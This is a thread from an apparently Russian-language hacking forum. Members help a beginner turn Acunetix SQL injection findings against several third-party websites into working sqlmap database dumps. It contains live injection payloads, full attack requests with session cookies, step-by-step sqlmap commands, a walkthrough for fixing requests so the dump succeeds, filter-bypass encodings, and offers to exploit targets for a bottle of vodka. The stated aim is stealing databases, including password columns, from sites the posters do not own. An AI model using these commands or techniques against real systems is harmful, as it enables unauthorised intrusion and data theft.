• XSS.stack #1 – первый литературный журнал от юзеров форума

помогите с sql инъекцией из Acunetix

092d55bd09

HDD-drive
Пользователь
Регистрация
24.06.2022
Сообщения
26
Реакции
3
Привет всем только начал заниматься сканированием сайтов через Acunetix и нашел несколько интересных мне ресурсов но не как не могу слить бд или продвинуться дальше во взломе пытался засунуть запрос в файл вот так -r file.txt --dbs --dbms=MySQL --risk=3 --level=5 -v3 и скормить sqlmap-у но увы не вышло или что то делаю не правильно либо хз подскажите кто может.

сам запрос
Скрытый контент для зарегистрированных пользователей.

GET /0'XOR(if(now()=sysdate(),sleep(12),0))XOR'Z/news-aggregator-iphone-app HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: https://www.site.com/
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.0 Safari/537.36
Host: www.site.com
Connection: Keep-alive


детали атаки


Скрытый контент для зарегистрированных пользователей.

Path Fragment input /[*]/<s> was set to 0'XOR(if(now()=sysdate(),sleep(12),0))XOR'Z

Tests performed:
  • 0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z => 17.089
  • 0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z => 16.181
  • 0'XOR(if(now()=sysdate(),sleep(12),0))XOR'Z => 19.111
  • 0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z => 2.984
  • 0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z => 9.067
  • 0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z => 2.93
  • 0'XOR(if(now()=sysdate(),sleep(12),0))XOR'Z => 15.08
 
Привет всем только начал заниматься сканированием сайтов через Acunetix и нашел несколько интересных мне ресурсов но не как не могу слить бд или продвинуться дальше во взломе пытался засунуть запрос в файл вот так -r file.txt --dbs --dbms=MySQL --risk=3 --level=5 -v3 и скормить sqlmap-у но увы не вышло или что то делаю не правильно либо хз подскажите кто может.

сам запрос
Скрытое содержимое

детали атаки


Скрытое содержимое
/threads/69732/post-474199
 
Уже так пробовал не получилось, может запрос не верно составил?

sqlmap.py -u "https://site.com/0'XOR(if(now()=sysdate(),sleep(12),0))XOR'Z/news-aggregator-iphone-app" --dbs --dbms=MySQL --risk=3 --level=5 --random-agent

Неправильно. Попробуй так:

Код:
sqlmap.py -u "https://site.com/0*/news-aggregator-iphone-app" --dbs --dbms=MySQL --risk=3 --level=5 --random-agent

Где 0* - вместо 0 можешь указать Original value который показывает акунетикс.

XOR(if(now()=sysdate(),sleep(12),0))XOR'Z - это пейлоад акунетикса, его никогда не надо пихать в sqlmap. Вместо этого помечай уязвимый параметр астериском *.
 
Последнее редактирование:
Неправильно. Попробуй так:

Код:
sqlmap.py -u "https://site.com/0*/news-aggregator-iphone-app" --dbs --dbms=MySQL --risk=3 --level=5 --random-agent

Где 0* - вместо 0 можешь указать Original value который показывает акунетикс.

XOR(if(now()=sysdate(),sleep(12),0))XOR'Z - это пейлоад акунетикса, его никогда не надо пихать в sqlmap. Вместо этого помечай уязвимый параметр астериском *.

Попробовал но увы не получилось не в какую, может есть другой способ как засунуть это все добро в sqlmap?
у меня 3 уязвимых сайта

первый

URL:https://www.shop1.com/Parameter:/[*]/<s>/

Attack Details​

arrow_drop_up
Path Fragment input /[*]/<s>/ was set to 0'XOR(if(now()=sysdate(),sleep(13),0))XOR'Z

Tests performed:
  • 0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z => 16.04
  • 0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z => 8.646
  • 0'XOR(if(now()=sysdate(),sleep(13),0))XOR'Z => 20.009
  • 0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z => 2.928
  • 0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z => 16.88
  • 0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z => 2.321
  • 0'XOR(if(now()=sysdate(),sleep(13),0))XOR'Z => 15.374

Original value: cloud-solutions

И HTTP Request от первого сайта

GET /0'XOR(if(now()=sysdate(),sleep(13),0))XOR'Z/aws/ HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: https://www.site1.com/
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.0 Safari/537.36
Host: www.site1.com
Connection: Keep-alive

Сайт второй

URL:https://www.site2.com/ajax_act.phpParameter:rate_url

Attack Details​

arrow_drop_up
URL encoded POST input rate_url was set to 1'"

Error message found:
You have an error in your SQL syntax

И HTTP Request от второго сайта

POST /ajax_act.php?t=439003 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: https://www.site2.com/
Cookie: PHPSESSID=3a38096c784d4c7ae5c3fd9d5f5943d2
Content-Length: 57
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.0 Safari/537.36
Host: www.site2.com
Connection: Keep-alive

action=userRating&rate_url=1'"&rating=0&ratingPoints=4678

И последний 3 сайт

URL:https://site3.com/web/reset_passwordParameter:token

Attack Details​

arrow_drop_up
POST (multipart) input token was set to -1' OR 3*2*1=6 AND 000644=000644 --

Tests performed:
  • -1' OR 2+644-644-1=0+0+0+1 -- => TRUE
  • -1' OR 3+644-644-1=0+0+0+1 -- => FALSE
  • -1' OR 3*2<(0+5+644-644) -- => FALSE
  • -1' OR 3*2>(0+5+644-644) -- => FALSE
  • -1' OR 2+1-1+1=1 AND 000644=000644 -- => FALSE
  • -1' OR 3*2=5 AND 000644=000644 -- => FALSE
  • -1' OR 3*2=6 AND 000644=000644 -- => TRUE
  • -1' OR 3*2*0=6 AND 000644=000644 -- => FALSE
  • -1' OR 3*2*1=6 AND 000644=000644 -- => TRUE

Original value: 1


И HTTP Request от третьего сайта

POST /web/reset_password?redirect=1 HTTP/1.1
Content-Type: multipart/form-data; boundary=----------YWJkMTQzNDcw
X-Requested-With: XMLHttpRequest
Referer: https://site3.com/web/login
Cookie: session_id=1ce328a77bb21604c90cee74667f4ea1828bf0ac; fileToken=1; frontend_lang=en_US
Content-Length: 426
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.0 Safari/537.36
Host: site3.com
Connection: Keep-alive

------------YWJkMTQzNDcw
Content-Disposition: form-data; name="csrf_token"

a74b46de4ae8a41a5e2a28ba2b907f308ceff236o1657467337
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="login"


------------YWJkMTQzNDcw
Content-Disposition: form-data; name="redirect"

1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="token"

-1' OR 3*2*1=6 AND 000644=000644 --
------------YWJkMTQzNDcw--

Прошу помощи запихнуть это все в sqlmap или в какой то софт что бы слить базы данных
пусть даже платной.
 
И HTTP Request от первого сайта
Код:
sqlmap.py -u "https://www.site1.com/cloud-solutions*/aws/" --dbs --dbms=MySQL --risk=3 --level=5 --random-agent
Если так не раскрутит, попробуй добавить --time-sec=13 --technique=T
Но с такой задержкой данные будут очень медленно дампится, один символ буквально 10-15 секунд, потому что это е#учий time-based.

Сайт второй
Код:
sqlmap.py -u "https://www.site2.com/ajax_act.php?t=439003" --data="action=userRating&rate_url=1*&rating=0&ratingPoints=4678" --dbs --dbms=MySQL --risk=3 --level=5 --random-agent

POST /web/reset_password?redirect=1 HTTP/1.1
Content-Type: multipart/form-data; boundary=----------YWJkMTQzNDcw
X-Requested-With: XMLHttpRequest
Referer: https://site3.com/web/login
Cookie: session_id=1ce328a77bb21604c90cee74667f4ea1828bf0ac; fileToken=1; frontend_lang=en_US
Content-Length: 426
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.0 Safari/537.36
Host: site3.com
Connection: Keep-alive

------------YWJkMTQzNDcw
Content-Disposition: form-data; name="csrf_token"

a74b46de4ae8a41a5e2a28ba2b907f308ceff236o1657467337
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="login"


------------YWJkMTQzNDcw
Content-Disposition: form-data; name="redirect"

1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="token"

-1' OR 3*2*1=6 AND 000644=000644 --
------------YWJkMTQzNDcw--
С этим (не видя сайта) сложно из-за CSRF, надо посмотреть сайт. А первые два пробуй как написал выше. Если ни чего не выйдет то скидывай в личку сайты, за ящик "Абсолюта" раскрутим!
 
Последнее редактирование:
Пожалуйста, обратите внимание, что пользователь заблокирован
honest effort from the op and clear , quality assistance from @c0d3x with straightforward explaining that results in op learning as well. I wish I saw more threads with exchanges like this.
 
Код:
sqlmap.py -u "https://www.site1.com/cloud-solutions*/aws/" --dbs --dbms=MySQL --risk=3 --level=5 --random-agent
If that doesn't work, try adding --time-sec=13 --technique=T
But with such a delay, the data will be dumped very slowly, one character is literally 10-15 seconds, because this is a fucking time-based.


Код:
sqlmap.py -u "https://www.site2.com/ajax_act.php?t=439003" --data="action=userRating&rate_url=1*&rating=0&ratingPoints=4678" --dbs --dbms =MySQL --risk=3 --level=5 --random-agent


With this (without seeing the site) it is difficult because of CSRF, you have to look at the site. And try the first two as I wrote above. If nothing comes of it, then throw off the sites in a personal, we will unwind for the "Absolute" box!
Help me! Share your telegram please
 
PM only.
Hi, I found this with Acunetix, can you give me ideas of how to dump properly with sqlmap? PM - closed.



QyIhr6N.png



sqlmap.py -u "https://example.com/admin/controller/function.php?blog_id=*" --random-agent --tamper=space2comment,between,randomcase --level 5 --risk 3 --threads 5 --dbs


6aydtcb.png



=========================================================================================================

udqEDPb.png

False positive?
 
Hi, I found this with Acunetix, can you give me ideas of how to dump properly with sqlmap? PM - closed.



QyIhr6N.png



sqlmap.py -u "https://example.com/admin/controller/function.php?blog_id=*" --random-agent --tamper=space2comment,between,randomcase --level 5 --risk 3 --threads 5 --dbs


6aydtcb.png



=========================================================================================================

udqEDPb.png

False positive?
This is opencart as i see? Idk what is it, you can post full request from Acunetix and URL under hide for me, i will check it.
 
Hi, I found this with Acunetix, can you give me ideas of how to dump properly with sqlmap? PM - closed.
sqlmap.py -u "https://example.com/admin/controller/function.php?blog_id=*" --random-agent --tamper=space2comment,between,randomcase --level 5 --risk 3 --threads 5 --dbs
6aydtcb.png
  • Внимательно всмотритесь в эти скрины и найдите первую ошибку из-за которой инъекция не крутится.
  • Ответ: Acunetix сообщает об инъекции в POST запросе. Чел пытается инжектить в GET. Заебись, умеете, могёте.
  • Далее чел скидывет в личку полный запрос из акунетикса:
Код:
POST /admin/controller/function.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----------YWJkMTQzNDcw
X-Requested-With: XMLHttpRequest
Referer: https://target.com/
Cookie: PHPSESSID=8cf93c6a070a1a7c7477e7b2ac0bd3a6
Content-Length: 507
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36
Host: target.com
Connection: Keep-alive

------------YWJkMTQzNDcw
Content-Disposition: form-data; name="blog_baslik"

<!--
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="blog_detay"

555
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="blog_id"

if(now()=sysdate(),sleep(6),0)
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="blogduzenle"

blogduzenle=
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="eski_yol"

assets/img/blog/2535124444.jpg
------------YWJkMTQzNDcw--

  • Но даже если вы сохраните этот запрос в .txt и скормите его SQLMap'у через флаг -r то вы все равно не раскрутите эту скулю. Подумайте, что здесь надо изменить? Ответы:
  • В первую очередь, здесь вставить полный URL, что-бы вместо POST /admin/controller/function.php HTTP/1.1 стало POST https://target.com/admin/controller/function.php HTTP/1.1 - иначе SQLMap будет обращаться к таргету по HTTP вместо HTTPS, и таргет будет редиректить мап через 301/302 редирект, что может стать причиной false positive/negative.
  • Вместо if(now()=sysdate(),sleep(6),0) указать Original value которое показывает акунетикс и пометить его звездочкой (астериском) - *, например 417834*. Если же сканнер вообще не показывает original value, то указать просто астериск вместо пэйлоада акунетикса.
  • Хидер Content-Length не даст вам раскрутить инъекцию, потому что он при каждом запросе в SQLMap будет обрезать этот запрос. В данном случае у нас Content-Length: 507, если мы его оставим, SQLMap задетектит инъекцию таким запросом: AND (SELECT 4845 FROM (SELECT(SLEEP(5)))YEVc), но когда мап начнет дальше этот вектор раскручивать и пытаться вытягивать данные из БД вот такими запросами: AND (SELECT 2142 FROM (SELECT(SLEEP(5-(IF(73 46,0,5)))))vYSK) - то из-за Content-Length: 507 запрос автоматически будет обрезаться до AND (SELECT 2142 FROM (SELECT(SLEEP(5-(IF(73, в результате чего SQLMap инъекцию будет детектить, но раскрутить так и не сможет. Поэтому хидер Content-Length в таких случаях просто полностью удаляем из запроса.
  • По желанию можно удалить куки, если это не критично и таргет ставит их сам, а так же можно удалить и другие хидеры типа Referer, Connection и прочие, в том случае если они не ломают сам запрос. Всегда сначала проверяйте запрос руками в любом request builder, пробуйте разные варианты, экспериментируйте, и не ебитесь в глаза, дабы не плодить подобные посты. По итогу у меня получился такой запрос:
Код:
POST https://target.com/admin/controller/function.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----------YWJkMTQzNDcw
X-Requested-With: XMLHttpRequest
Referer: https://target.com/
Host: target.com
Connection: Keep-alive

------------YWJkMTQzNDcw
Content-Disposition: form-data; name="blog_baslik"

<!--
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="blog_detay"

555
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="blog_id"

1252*
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="blogduzenle"

blogduzenle=
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="eski_yol"

assets/img/blog/2535124444.jpg
------------YWJkMTQzNDcw--

  • Который сохраняется в .txt и подается так: sqlmap.py -r "/home/request.txt" --dbs --dbms=MySQL --risk=3 --level=5 --random-agent -v3 --technique=T
  • Вместо /home/request.txt указываете путь до вашего .txt с запросом. --technique=T я использую потому что в нашем случае на таргете только Time-Based инъекция. А так, можно вообще это убрать.
  • Еще -v3 можно убрать, по желанию, дабы не показывался каждый отправленный пэйлоад.
 
Последнее редактирование:
c0d3x that post was GOLDEN.
As you understood I just started experimenting with sqlmap and acunetix.

So still I have no idea what im doing, reading more articles, courses, CTFs etc
I can tell you do not forget where you came from & try to help any kind of stupid question so I love you for that.

Thank you for taking time & effort in the PM & also here to help everyone understand more who is a beginner like me.
Very well explained and detailed. Everything is clear now ++
 
  • Внимательно всмотритесь в эти скрины и найдите первую ошибку из-за которой инъекция не крутится.
  • Ответ: Acunetix сообщает об инъекции в POST запросе. Чел пытается инжектить в GET. Заебись, умеете, могёте.
  • Далее чел скидывет в личку полный запрос из акунетикса:
Код:
POST /admin/controller/function.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----------YWJkMTQzNDcw
X-Requested-With: XMLHttpRequest
Referer: https://target.com/
Cookie: PHPSESSID=8cf93c6a070a1a7c7477e7b2ac0bd3a6
Content-Length: 507
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36
Host: target.com
Connection: Keep-alive

------------YWJkMTQzNDcw
Content-Disposition: form-data; name="blog_baslik"

<!--
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="blog_detay"

555
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="blog_id"

if(now()=sysdate(),sleep(6),0)
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="blogduzenle"

blogduzenle=
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="eski_yol"

assets/img/blog/2535124444.jpg
------------YWJkMTQzNDcw--

  • Но даже если вы сохраните этот запрос в .txt и скормите его SQLMap'у через флаг -r то вы все равно не раскрутите эту скулю. Подумайте, что здесь надо изменить? Ответы:
  • В первую очередь, здесь вставить полный URL, что-бы вместо POST /admin/controller/function.php HTTP/1.1 стало POST https://target.com/admin/controller/function.php HTTP/1.1 - иначе SQLMap будет обращаться к таргету по HTTP вместо HTTPS, и таргет будет редиректить мап через 301/302 редирект, что может стать причиной false positive/negative.
  • Вместо if(now()=sysdate(),sleep(6),0) указать Original value которое показывает акунетикс и пометить его звездочкой (астериском) - *, например 417834*. Если же сканнер вообще не показывает original value, то указать просто астериск вместо пэйлоада акунетикса.
  • Хидер Content-Length не даст вам раскрутить инъекцию, потому что он при каждом запросе в SQLMap будет обрезать этот запрос. В данном случае у нас Content-Length: 507, если мы его оставим, SQLMap задетектит инъекцию таким запросом: AND (SELECT 4845 FROM (SELECT(SLEEP(5)))YEVc), но когда мап начнет дальше этот вектор раскручивать и пытаться вытягивать данные из БД вот такими запросами: AND (SELECT 2142 FROM (SELECT(SLEEP(5-(IF(73 46,0,5)))))vYSK) - то из-за Content-Length: 507 запрос автоматически будет обрезаться до AND (SELECT 2142 FROM (SELECT(SLEEP(5-(IF(73, в результате чего SQLMap инъекцию будет детектить, но раскрутить так и не сможет. Поэтому хидер Content-Length в таких случаях просто полностью удаляем из запроса.
  • По желанию можно удалить куки, если это не критично и таргет ставит их сам, а так же можно удалить и другие хидеры типа Referer, Connection и прочие, в том случае если они не ломают сам запрос. Всегда сначала проверяйте запрос руками в любом request builder, пробуйте разные варианты, экспериментируйте, и не ебитесь в глаза, дабы не плодить подобные посты. По итогу у меня получился такой запрос:
Код:
POST https://target.com/admin/controller/function.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----------YWJkMTQzNDcw
X-Requested-With: XMLHttpRequest
Referer: https://target.com/
Host: target.com
Connection: Keep-alive

------------YWJkMTQzNDcw
Content-Disposition: form-data; name="blog_baslik"

<!--
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="blog_detay"

555
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="blog_id"

1252*
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="blogduzenle"

blogduzenle=
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="eski_yol"

assets/img/blog/2535124444.jpg
------------YWJkMTQzNDcw--

  • Который сохраняется в .txt и подается так: sqlmap.py -r "/home/request.txt" --dbs --dbms=MySQL --risk=3 --level=5 --random-agent -v3 --technique=T
  • Вместо /home/request.txt указываете путь до вашего .txt с запросом. --technique=T я использую потому что в нашем случае на таргете только Time-Based инъекция. А так, можно вообще это убрать.
  • Еще -v3 можно убрать, по желанию, дабы не показывался каждый отправленный пэйлоад.
Бро ты шаришь, можешь помочь пожалуйста,
sqlmap -u "http://website.com/index.php?id=*$m=announce" --level=5 --risk=3 --random-agent --dbms=mysql --dbs выдает одну базу данных, но когда пытаюсь получить таблицы, то говорит "unable to retrieve names", далее я пробрутил через common_columns wordlist до колонки logonpasswords и снова "unable to retrieve the number of columns 'logonpassword' entries for table 'moradia' in database 'progres1'" как это исправить? метод GET, time-based blind и команда sqlmap -u "http://website.com/index.php?id=*$m=announce" --level=5 --risk=3 --random-agent --dbms=mysql -D progres1 -T moradia -C logonpassword --dump
 
Последнее редактирование:
Бро ты шаришь, можешь помочь пожалуйста,
sqlmap -u "http://website.com/index.php?id=*$m=announce" --level=5 --risk=3 --random-agent --dbms=mysql --dbs выдает одну базу данных, но когда пытаюсь получить таблицы, то говорит "unable to retrieve names", далее я пробрутил через common_columns wordlist до колонки logonpasswords и снова "unable to retrieve the number of columns 'logonpassword' entries for table 'moradia' in database 'progres1'" как это исправить? метод GET, time-based blind и команда sqlmap -u "http://website.com/index.php?id=*$m=announce" --level=5 --risk=3 --random-agent --dbms=mysql -D progres1 -T moradia -C logonpassword --dump
Через -v3 посмотри на каком запросе застревает, и попробуй руками запрос воспроизвести, как выше писал в любом request билдере, может на таргете фильтруется что-либо.
 
Good evening, can you help?

I got SQL Injection in a client's site but not able to dump any data. I can execute sleep() with query

1 AND sleep(10)

But every time my query contains either a dot(.) or comma(,) the server redirects to 404. For example mysql.users or information_schema.tables shouldn't work. I know about comma bypass technique but stuck with the dot(.) I am sure its not firewall since its filtering only these 2 characters so probably the backed framework Kohana is messing with it.
 
I got SQL Injection in a client's site but not able to dump any data. I can execute sleep() with query

1 AND sleep(10)

But every time my query contains either a dot(.) or comma(,) the server redirects to 404. For example mysql.users or information_schema.tables shouldn't work. I know about comma bypass technique but stuck with the dot(.) I am sure its not firewall since its filtering only these 2 characters so probably the backed framework Kohana is messing with it.
Have you tried double encode? For dot: %252e, for comma %252c or %82. Sometimes it works great. If you can not solve this problem, you can send me (under hide) a vulnerability, i will try to bypass.
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх